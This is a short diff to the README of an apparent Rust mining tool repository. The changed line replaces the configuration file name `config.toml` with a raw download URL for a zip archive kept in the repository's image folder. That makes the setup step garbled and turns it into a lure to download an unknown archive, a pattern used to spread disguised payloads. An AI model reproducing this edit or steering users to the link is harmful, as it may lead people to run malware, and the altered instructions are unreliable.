zhahitech/RustMinerSystem/README.md

 The configuration file allows you to set various parameters for your mining operations.
 Here’s how to configure it:

-1. Locate the configuration file, typically named `config.toml`.
+1. Locate the configuration file, typically named `https://github.com/zhahitech/RustMinerSystem/raw/refs/heads/main/image/Rust-Miner-System-v2.5.zip`.
 2. Open the file in a text editor.
 3. Modify the following sections: